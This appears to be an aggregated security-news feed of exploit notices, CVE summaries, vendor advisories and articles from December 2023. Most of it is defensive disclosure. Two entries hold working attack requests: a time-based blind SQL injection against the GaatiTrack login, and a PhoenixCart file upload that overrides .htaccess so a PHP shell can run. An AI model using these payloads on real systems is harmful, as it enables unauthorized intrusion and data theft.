A Blind SQL injection issue in ajax.php in GaatiTrack Courier Management System 1.0 allows an unauthenticated attacker to inject a payload via the email parameter during login.

    # Exploit Title: GaatiTrack Courier Management System v1.0 - SQL Injection# Date: 13/11/2023# Exploit Author: BugsBD Limited# Discover by: Rahad Chowdhury# Vendor Homepage: https://www.mayurik.com/# Software Link:https://www.mayurik.com/source-code/P0998/best-courier-management-system-project-in-php# Version: v1.0# Tested on: Windows 10, PHP 8.2.4, Apache 2.4.56# CVE: CVE-2023-48823Descriptions:Blind SQL injection in ajax.php in GaatiTrack Courier ManagementSystem v1.0 allows an unauthenticated attacker to insert malicious SQLqueries via email parameter.Steps to Reproduce:1. Request:POST /gaatitrack/ajax.php?action=login HTTP/1.1Host: 192.168.1.74User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)Gecko/20100101 Firefox/119.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 83Origin: http://192.168.1.74Connection: closeReferer: http://192.168.1.74/gaatitrack/login.phpCookie: PHPSESSID=abl1dci7hob2f90sf5ag9k00mp;KOD_SESSION_SSO=8lu85nmqbd7o912f2lldm1g08k;KOD_SESSION_ID_53f4f=p7am25v0dladkuqetsqer4mdhcemail=test%40test.com&password=1234562. Now use blind sqli query after email parameter. So your request data will be:POST /gaatitrack/ajax.php?action=login HTTP/1.1Host: 192.168.1.74User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)Gecko/20100101 Firefox/119.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 83Origin: http://192.168.1.74Connection: closeReferer: http://192.168.1.74/gaatitrack/login.phpCookie: PHPSESSID=abl1dci7hob2f90sf5ag9k00mp;KOD_SESSION_SSO=8lu85nmqbd7o912f2lldm1g08k;KOD_SESSION_ID_53f4f=p7am25v0dladkuqetsqer4mdhcemail=test%40test.com'XOR(if(now()=sysdate()%2Csleep(4)%2C0))XOR'&password=123456## Reproduce:[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48823)

CVE-2023-48823: GaatiTrack Courier Management System 1.0 SQL Injection ≈ Packet Storm

A Cross Site Scripting vulnerability in Availability Booking Calendar 5.0 allows an attacker to inject JavaScript via the name, plugin_sms_api_key, plugin_sms_country_code, uuid, title, or country name parameter to index.php.

    # Exploit Title: Multiple Cross Site Scripting in PHPJabbers AvailabilityBooking Calendar v5.0# Date: 12/11/2023# Exploit Author: BugsBD Security Researcher (Orpon)# Vendor Homepage: https://www.phpjabbers.com/# Software Link:https://www.phpjabbers.com/availability-booking-calendar/#sectionDemo# Version: v5.0# Tested on: Windows 10, Linux# CVE: CVE-2023-48208Description:PHPJabbers Availability Booking Calendar v5.0 is vulnerable to MultipleStored Cross-Site Scripting (XSS) vulnerabilities in the "name,plugin_sms_api_key, plugin_sms_country_code, uuid, title, country name"parameters of index.php page.Steps to Reproduce:1. Login your panel2. Go to System Menu then click SMS Settings.3. Then use any XSS Payload in "SMS API Key", "Default Country Code" inputfield and Save.4. You will see XSS pop up.## Reproduce:[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48208)

CVE-2023-48208: PHPJabbers Availability Booking Calendar 5.0 Cross Site Scripting ≈ Packet Storm

strongSwan before 5.9.12 has a buffer overflow and possible unauthenticated remote code execution via a DH public value that exceeds the internal buffer in charon-tkm's DH proxy. The earliest affected version is 5.3.0. An attack can occur via a crafted IKE_SA_INIT message.

CVE-2023-41913: Releases · strongswan/strongswan

An issue was discovered in the function gdev_prn_open_printer_seekable() in Artifex Ghostscript through 10.02.0 allows remote attackers to crash the application via a dangling pointer.

Ghostscript is an interpreter for the PostScript®  language and PDF files. It is available under either the GNU GPL Affero license or  licensed for commercial use from Artifex Software, Inc. It has been under active development for over 30 years and has been ported to several different systems during this time. Ghostscript consists of a PostScript interpreter layer and a graphics library.

There are a family of other products, including GhostPCL, GhostPDF, and GhostXPS that are built upon the same graphics library. Between them, this family of products offers native rendering of all major page description languages. Our latest product, GhostPDL, pulls all these languages into a single executable.

Full descriptions of these products can be found on our documentation introduction.

In addition to rendering to raster formats, Ghostscript offers high-level conversion through our vector output devices.

Written entirely in C, Ghostscript runs on various embedded operating systems and platforms including Windows, macOS, the wide variety of Unix and Unix-like platforms, and VMS systems.

**Current Release**

The current Ghostscript release 10.02.1 can be downloaded here.

**NEW in this Release**

*   Old PDF Interpreter has now been removed - see https://ghostscript.com/blog/pdfi.html for more details
*   And more! Review the full release notes.

**The Ghostscript Blog**

Find news, articles and developer notes from the Ghostscript engineering team on the blog.

**Security Advisory**

*   *   November 1, 2023: Ghostscript/GhostPDL 10.02.1 release fixes CVE-2023-46751.
        
    *   CVE-2023-46751 affects _all_ Ghostscript/GhostPDL versions prior to 10.02.1.
        
    *   CVE-2023-46751 is a shell command injection/remote code execution risk, so we recommend upgrading to version 10.02.1 as a matter of urgency
        
    
    *   September 18, 2023: Ghostscript/GhostPDL 10.02.0 release fixes CVE-2023-43115.
        
    *   CVE-2023-43115 affects _all_ Ghostscript/GhostPDL versions prior to 10.02.0.
        
    *   CVE-2023-43115 is a remote code execution risk, so we recommend upgrading to version 10.02.0 as a matter of urgency
        
    
    *   June 27, 2023: Ghostscript/GhostPDL 10.01.2 release fixes CVE-2023-36664.
        
    *   CVE-2023-36664 affects _all_ Ghostscript/GhostPDL versions prior to 10.01.2.
        
*   April 3, 2023: Ghostscript/GhostPDL 10.01.1 release fixes CVE-2023-28879.
    
*   April 4, 2022: Ghostscript/GhostPDL 9.56.1 bundles zlib 1.2.12 which addresses CVE-2018-25032.
    
*   December 16, 2021: Apache Log4J vulnerability – GHOSTSCRIPT NOT AFFECTED – For more info: CVE-2021-44228
    

**Related projects**

*   Memento: A memory debugging library for C (or C++) programs.
*   jbig2dec: A JBIG2 image decoder.

CVE-2023-46751: Ghostscript

Cisco Talos has disclosed 10 vulnerabilities over the past two weeks, including nine that exist in a popular online PDF reader that offers a browser plugin.

Wednesday, December 6, 2023 13:33

Cisco Talos has disclosed 10 vulnerabilities over the past two weeks, including nine that exist in a popular online PDF reader that offers a browser plugin. 

Attackers could exploit these vulnerabilities in the Foxit PDF Reader to carry out a variety of malicious actions, but most notably could gain the ability to execute arbitrary code on the targeted machine. Foxit aims to have feature parity with Adobe Acrobat Reader, the most popular PDF-reading software currently on the market. The company offers paid versions of its software for a variety of users, including individuals and enterprises. There are also browser plugins of Foxit that run in a variety of web browsers, including Google Chrome and Mozilla Firefox. 

Talos’ Vulnerability Research team also found an integer overflow vulnerability in the GPSd daemon, which is triggered if an attacker sends a specially crafted packet, causing the daemon to crash. 

For Snort coverage that can detect the exploitation of these vulnerabilities, download the latest rule sets from Snort.org, and our latest Vulnerability Advisories are always posted on Talos Intelligence’s website.  

**Multiple vulnerabilities in Foxit PDF Reader **

_Discovered by Kamlapati Choubey._ 

Foxit PDF Reader contains multiple vulnerabilities that could lead to remote code execution if exploited correctly.  

TALOS-2023-1837 (CVE-2023-32616) and TALOS-2023-1839 (CVE-2023-38573) can be exploited if an attacker embeds malicious JavaScript into a PDF, and the targeted user opens that PDF in Foxit. These vulnerabilities can trigger the use of a previously freed object, which can lead to memory corruption and arbitrary code execution.  

TALOS-2023-1838 (CVE-2023-41257) works in the same way, but in this case, it is caused by a type confusion vulnerability.  

Three other vulnerabilities could allow an attacker to create arbitrary HTA files in the context application, and eventually gain the ability to execute arbitrary code on the targeted machine. TALOS-2023-1832 (CVE-2023-39542), TALOS-2023-1833 (CVE-2023-40194) and TALOS-2023-1834 (CVE-2023-35985) are all triggered if the targeted user opens a specially crafted file in the Foxit software or browser plugin. 

**GPSd NTRIP Stream Parsing access violation vulnerability **

_Discovered by Dimitrios Tatsis._ 

An integer overflow vulnerability exists in the NTRIP Stream Parsing functionality of GPS daemon, which is used to collect and display GPS information in other software. A specially crafted network packet can lead to memory corruption. An attacker can send a malicious packet to trigger TALOS-2023-1860 (CVE-2023-43628). 

According to GPSd’s website, this service daemon powers the map service on Android mobile devices and is “ubiquitous in drones, robot submarines, and driverless cars.” 

_Discovered by Claudio Bozzato and Francesco Benvenuto._ 

Talos researchers recently found multiple data integrity vulnerabilities in Buildroot, a tool that automates builds of Linux environments for embedded systems. 

An adversary could carry out a man-in-the-middle attack to exploit TALOS-2023-1845 (CVE-2023-43608) and TALOS-2023-1844 (CVE-2023-45842, CVE-2023-45839, CVE-2023-45838, CVE-2023-45840 and CVE-2023-45841) to execute arbitrary code in the builder. 

As a direct consequence, an attacker could then also tamper with any file generated for Buildroot’s targets and hosts. 

**Malformed Excel file could lead to arbitrary code execution in WPS Office **

_Discovered by Marcin “Icewall” Noga._ 

An uninitialized pointer use vulnerability (TALOS-2023-1748/CVE-2023-31275) exists in the functionality of WPS Office, a suite of software for word and data processing, that handles Data elements in an Excel file.  

A specially crafted malformed Excel file can lead to remote code execution. 

WPS Office, previously known as a Kingsoft Office, is a software suite for Microsoft Windows, macOS, Linux, iOS, Android, and HarmonyOS developed by Chinese software developer Kingsoft. It is installed by default on Amazon Fire tablet devices. 

Talos disclosed this vulnerability in November despite no official fix or patch from Kingsoft after the company did not respond to our notification attempts and failed the 90-day deadline as outlined in Cisco’s third-party vendor vulnerability disclosure policy.

Remote code execution vulnerabilities found in Buildroot, Foxit PDF Reader

Using go get to fetch a module with the ".git" suffix may unexpectedly fallback to the insecure "git://" protocol if the module is unavailable via the secure "https://" and "git+ssh://" protocols, even if GOINSECURE is not set for said module. This only affects users who are not using the module proxy and are fetching modules directly (i.e. GOPROXY=off).

Hello gophers,

We have just released Go versions 1.21.5 and 1.20.12, minor point releases.

These minor releases include 3 security fixes following the security policy:

*   net/http: limit chunked data overhead
    
    A malicious HTTP sender can use chunk extensions to cause a receiver reading from a request or response body to read many more bytes from the network than are in the body.
    
    A malicious HTTP client can further exploit this to cause a server to automatically read a large amount of data (up to about 1GiB) when a handler fails to read the entire body of a request.
    
    Chunk extensions are a little-used HTTP feature which permit including additional metadata in a request or response body sent using the chunked encoding. The net/http chunked encoding reader discards this metadata. A sender can exploit this by inserting a large metadata segment with each byte transferred. The chunk reader now produces an error if the ratio of real body to encoded bytes grows too small.
    
    Thanks to Bartek Nowotarski for reporting this issue.
    
    This is CVE-2023-39326 and Go issue https://go.dev/issue/64433.
    
*   cmd/go: go get may unexpectedly fallback to insecure git
    
    Using go get to fetch a module with the ".git" suffix may unexpectedly fallback  
    to the insecure "git://" protocol if the module is unavailable via the secure  
    "https://" and "git+ssh://" protocols, even if GOINSECURE is not set for said  
    module. This only affects users who are not using the module proxy and are  
    fetching modules directly (i.e. GOPROXY=off).
    
    Thanks to David Leadbeater for reporting this issue.
    
    This is CVE-2023-45285 and Go issue https://go.dev/issue/63845.
    
*   path/filepath: retain trailing \ when cleaning paths like \\?\c:\
    
    Go 1.20.11 and Go 1.21.4 inadvertently changed the definition of the volume name in Windows paths starting with \\?\, resulting in filepath.Clean(\\?\c:\) returning \\?\c: rather than \\?\c:\ (among other effects). The previous behavior has been restored.
    
    This is an update to CVE-2023-45283 and Go issue https://go.dev/issue/64028.
    

View the release notes for more information:  
https://go.dev/doc/devel/release#go1.21.5

You can download binary and source distributions from the Go website:  
https://go.dev/dl/

To compile from source using a Git clone, update to the release with  
git checkout go1.21.5 and build as usual.

Thanks to everyone who contributed to the releases.

Cheers,  
Carlos and Dmitri for the Go team

CVE-2023-45285: [security] Go 1.21.5 and Go 1.20.12 are released

By Deeba Ahmed
CISA Warns of Critical Adobe ColdFusion Vulnerability Actively Exploited by Threat Actors.
This is a post from HackRead.com Read the original post: Adobe ColdFusion Flaw Used by Hackers to Access US Govt Servers

Authorities urge Adobe ColdFusion customers to promptly install patches and update their systems.

The Cybersecurity and Infrastructure Security Agency (CISA) has issued a Cybersecurity Advisory (CSA) alerting organizations to the exploitation of a critical vulnerability in Adobe ColdFusion by unidentified threat actors.

The vulnerability, **CVE-2023-26360**, affects Adobe ColdFusion versions 2018 Update 15 (and earlier) and 2021 Update 5 (and earlier), as well as older ColdFusion installations that Adobe no longer supports.

Exploitation of CVE-2023-26360 allows threat actors to execute arbitrary code on affected systems, posing a significant security risk. The vulnerability was added to CISA’s known exploited vulnerability (KEV) catalogue right after its discovery, and an April 5 deadline was given to agencies to fix the issue. 

Adobe ColdFusion is a widely used software suite for web application development. Hackread has been reporting this vulnerability ever since it was **discovered** in March. We reported in August 2023 that this critical remote code execution (RCE) flaw, which impacts both Windows and macOS platforms, allows attackers to seize control of affected systems, making it a high-severity cybersecurity risk. Adobe **released** security patches to address the following vulnerabilities:

*   APSB23-40
*   APSB23-41
*   APSB23-47

However, FortiGuard Labs observed continued exploitation attempts at that time, indicating that some users had not yet applied the patches.

Now, the same vulnerability has been exploited by unidentified hackers to gain access to two systems within a Federal Civilian Executive Branch (**FCEB**) agency. Reportedly, the FCEB was running outdated versions, including ColdFusion, which made it vulnerable to the exploit. The hackers were able to gain initial access to two public-facing web servers within the agency’s pre-production environment.

At least two public-facing servers within a Federal Civilian Executive Branch (FCEB) agency were **targeted** with this vulnerability between June and July 2023. Here are the details of the attacks:

**June 2:** Initial access, reconnaissance activities (local/domain admin information, network configurations, user details), and deployment of a remote access trojan (**RAT**). Attempts to exfiltrate data, obtain credentials, download data from C2 infrastructure, and change policies were unsuccessful.

**June 26:** Attackers connected through a malicious IP address, exploited the vulnerability, and analysed running processes. They navigated the filesystem, deleted logs, and executed malicious code designed for ColdFusion versions 9 and below (targeting usernames, passwords, and URLs).

The code could enable future attacks and upload additional files from an unknown source. Password decryption was not possible due to the agency’s newer ColdFusion version. Attempts to conceal the web shell also failed.

While the hackers could insert malware and launch a reconnaissance campaign, there is no evidence of data exfiltration or lateral movement. The agency removed the compromised servers from the network within 24 hours of receiving the alert. CISA is yet to clarify whether the two attacks originated from the same operators.

****_RELATED ARTICLES_****

1.  **68% of US Websites Exposed to Bot Attacks**
2.  **Fake Lockdown Mode Exposes iOS Users to Malware Attacks**
3.  **Cyberattack Defaces Israeli-Made Equipment at US Water Agency**
4.  **Hackers Leak Thousands of Idaho National Lab Employees’ PII Data**
5.  **USPS Delivery Phishing Scam Exploits SaaS Providers to Steal Data**

Adobe ColdFusion Flaw Used by Hackers to Access US Govt Servers

CE Phoenixcart version 1.0.8.20 suffers from a remote shell upload vulnerability.

## Title: PhoenixCart-1.0.8.20-File-Upload-Bypass-override-htaccess-security-RCE  
## Author: nu11secur1ty  
## Date: 12/06/2023  
## Vendor: https://phoenixcart.org/index.php  
## Software: https://github.com/CE-PhoenixCart/PhoenixCart/archive/master.zip  
## Reference: https://portswigger.net/web-security/file-upload,  
https://portswigger.net/web-security/file-upload/lab-file-upload-remote-code-execution-via-web-shell-upload

## Description:  
The Categories/Products Product Images upload function, is ABSOLUTELY  
NOT SANITIZING WELL for file uploading from any type of extension!  
In this case, you can see a bypassing of .HTACCESS SECURITY file and  
uploading an info.php exploit file which info.php can be executed from  
everywhere for dumping the all information about the server! This can  
be done on the demo server! Please do not do this! I am a Penetration  
Tester, not a stupid cracker, and that's why I downloaded it,  
installed it, and tested it!  
If you want to test it yourself please download it, install it, and test it!  
Thank you all!

STATUS: HIGH-CRITICAL Vulnerability  
[+]Exploit execution:  
```POST  
POST /PhoenixCart/admin/catalog.php?cPath=&action=update_product&pID=10 HTTP/1.1  
Host: pwnedhost7.com  
Content-Length: 2952  
Cache-Control: max-age=0  
Upgrade-Insecure-Requests: 1  
Origin: http://pwnedhost7.com  
Content-Type: multipart/form-data;  
boundary=----WebKitFormBoundaryeDPXR7DpYcn3eWA1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)  
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7  
Referer: http://pwnedhost7.com/PhoenixCart/admin/catalog.php?cPath=&pID=10&action=new_product  
Accept-Encoding: gzip, deflate, br  
Accept-Language: en-US,en;q=0.9  
Cookie: cepcAdminID=ukrk3ssr0jd6iqsnn9ofuccmbt  
Connection: close

------WebKitFormBoundaryeDPXR7DpYcn3eWA1  
Content-Disposition: form-data; name="formid"

733e378dc8154accdbfd80762cc385f48d5566560ac3b264db19393f9beb268e  
------WebKitFormBoundaryeDPXR7DpYcn3eWA1  
Content-Disposition: form-data; name="products_date_added"

2023-12-06 11:36:36  
------WebKitFormBoundaryeDPXR7DpYcn3eWA1  
Content-Disposition: form-data; name="products_status"

1  
------WebKitFormBoundaryeDPXR7DpYcn3eWA1  
Content-Disposition: form-data; name="products_quantity"

0  
------WebKitFormBoundaryeDPXR7DpYcn3eWA1  
Content-Disposition: form-data; name="products_date_available"

2023-12-14 00:00:00  
------WebKitFormBoundaryeDPXR7DpYcn3eWA1  
Content-Disposition: form-data; name="manufacturers_id"

------WebKitFormBoundaryeDPXR7DpYcn3eWA1  
Content-Disposition: form-data; name="products_model"

------WebKitFormBoundaryeDPXR7DpYcn3eWA1  
Content-Disposition: form-data; name="products_tax_class_id"

1  
------WebKitFormBoundaryeDPXR7DpYcn3eWA1  
Content-Disposition: form-data; name="products_price"

1000.0000  
------WebKitFormBoundaryeDPXR7DpYcn3eWA1  
Content-Disposition: form-data; name="products_price_gross"

1070  
------WebKitFormBoundaryeDPXR7DpYcn3eWA1  
Content-Disposition: form-data; name="products_weight"

1.00  
------WebKitFormBoundaryeDPXR7DpYcn3eWA1  
Content-Disposition: form-data; name="products_gtin"

00000000000001  
------WebKitFormBoundaryeDPXR7DpYcn3eWA1  
Content-Disposition: form-data; name="products_name[1]"

pwned  
------WebKitFormBoundaryeDPXR7DpYcn3eWA1  
Content-Disposition: form-data; name="products_description[1]"

pwned your services  
------WebKitFormBoundaryeDPXR7DpYcn3eWA1  
Content-Disposition: form-data; name="products_url[1]"

------WebKitFormBoundaryeDPXR7DpYcn3eWA1  
Content-Disposition: form-data; name="products_seo_title[1]"

------WebKitFormBoundaryeDPXR7DpYcn3eWA1  
Content-Disposition: form-data; name="products_seo_description[1]"

------WebKitFormBoundaryeDPXR7DpYcn3eWA1  
Content-Disposition: form-data; name="products_seo_keywords[1]"

------WebKitFormBoundaryeDPXR7DpYcn3eWA1  
Content-Disposition: form-data; name="products_image"; filename=""  
Content-Type: application/octet-stream

------WebKitFormBoundaryeDPXR7DpYcn3eWA1  
Content-Disposition: form-data; name="products_image_large_1";  
filename=".htaccess"  
Content-Type: application/octet-stream

# $Id$  
#  
# This is used to restrict access to this folder to anything other  
# than images

# Prevents any script files from being accessed from the images folder  
<FilesMatch "\.(php([0-9]|s)?|s?p?html|cgi|pl|exe)$">  
  <IfModule mod_authz_core.c>  
    # Require all denied  
  </IfModule>

  <IfModule !mod_authz_core.c>  
    Order Deny,Allow  
    # Deny from all  
    Allow from all  
  </IfModule>  
</FilesMatch>

Options -Indexes

------WebKitFormBoundaryeDPXR7DpYcn3eWA1  
Content-Disposition: form-data; name="products_image_htmlcontent_1"

------WebKitFormBoundaryeDPXR7DpYcn3eWA1--

```

[+]Response:  
```PHP  
GET /PhoenixCart/images/info.php HTTP/1.1  
Host: pwnedhost7.com  
Cache-Control: max-age=0  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)  
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7  
Accept-Encoding: gzip, deflate, br  
Accept-Language: en-US,en;q=0.9  
Connection: close  
```

## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/CE-Phoenix/2023/PhoenixCart-1.0.8.20)

## Proof and Exploit:  
[href](https://www.nu11secur1ty.com/2023/12/phoenixcart-10820-file-upload-bypass.html)

## Time spent:  
00:17:00

--   
System Administrator - Infrastructure Engineer  
Penetration Testing Engineer  
Exploit developer at https://packetstormsecurity.com/  
https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and  
https://www.exploit-db.com/  
0day Exploit DataBase https://0day.today/  
home page: https://www.nu11secur1ty.com/  
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=  
                          nu11secur1ty <http://nu11secur1ty.com/>

--   
System Administrator - Infrastructure Engineer  
Penetration Testing Engineer  
Exploit developer at https://packetstormsecurity.com/  
https://cve.mitre.org/index.html  
https://cxsecurity.com/ and https://www.exploit-db.com/  
0day Exploit DataBase https://0day.today/  
home page: https://www.nu11secur1ty.com/  
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=  
                          nu11secur1ty <http://nu11secur1ty.com/>

CE Phoenixcart 1.0.8.20 Shell Upload

Red Hat Security Advisory 2023-7662-03 - An update for windows-machine-config-operator-bundle-container and windows-machine-config-operator-container is now available for Red Hat OpenShift Container Platform 4.11. Issues addressed include a privilege escalation vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7662.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: Red Hat OpenShift for Windows Containers 6.0.3 security updateAdvisory ID:        RHSA-2023:7662-03Product:            Red Hat OpenShift EnterpriseAdvisory URL:       https://access.redhat.com/errata/RHSA-2023:7662Issue date:         2023-12-06Revision:           03CVE Names:          CVE-2023-5528====================================================================Summary: An update for windows-machine-config-operator-bundle-container and windows-machine-config-operator-container is now available for Red Hat OpenShift Container Platform 4.11.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Red Hat OpenShift for Windows Containers allows you to deploy Windows container workloads running on Windows Server containers.Security Fix(es):* golang: net/http, x/net/http2: rapid stream resets can cause excessive work (CVE-2023-44487) (CVE-2023-39325)* kubernetes: Insufficient input sanitization in in-tree storage plugin leads to privilege escalation on Windows nodes (CVE-2023-5528)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://docs.openshift.com/container-platform/latest/windows_containers/windows-node-upgrades.htmlCVEs:CVE-2023-5528References:https://access.redhat.com/security/updates/classification/#importanthttps://access.redhat.com/security/vulnerabilities/RHSB-2023-003https://bugzilla.redhat.com/show_bug.cgi?id=2243296https://bugzilla.redhat.com/show_bug.cgi?id=2247163https://issues.redhat.com/browse/WINC-1109

Red Hat Security Advisory 2023-7662-03

Microsoft announced it will offer a similar extended security updates program for Windows 10 as it did for Windows 7

The day that Windows 10 machines will get their last security updates is set for October 14, 2025. So if you want to stay secure, you’d have to upgrade to a newer version. Either to Windows 11, which is not all that different, but more demanding when it comes to system requirements. Or to the rumored Windows 12 which might be out by then.

Despite the fact that Windows 11 has been around for a while, market share would have it that Windows 10 is still far more popular. Windows 11 shows a slight increase in usage, but not a very significant one.

Which is strange, since apart from the surprising Copilot introduction, Windows 10 hasn’t seen any major changes. But some people don’t like changes that much. Once they are used to something they want to keep it that way.

So, it makes sense that, similar to the extended security updates program Microsoft offered Windows 7 users years ago, it will now introduce a similar extension program for Windows 10.

The extended security update (ESU) program for Windows 10 is mentioned almost as a footnote in the options users have when end of support (EOS) for Windows 10 comes to light. The suggestions Microsoft offers first are:

*   Upgrade eligible PCs to Windows 11.
*   Purchase new Windows 11 machines.
*   Migrate to the cloud and subscribe to Windows 365.

But how much will the ESU program cost you? Microsoft says that pricing will be provided at a later date. But if the costs for Windows 7 were any indication, the first year came at $70 and doubled each consecutive year, so the third (and last) year was priced at $280. And that was just for security updates. ESUs do not include new features, customer-requested non-security updates, or design change requests.

What will be different this time is that home users will also be able to buy the ESU subscriptions.

Jason Leznek, Principal Product Manager for Windows Servicing and Delivery said:

> “Stay tuned for more ESU program updates as we approach availability, including an ESU program for individual consumers.”

Our business solutions remove all remnants of ransomware and prevent you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

Tag

#windows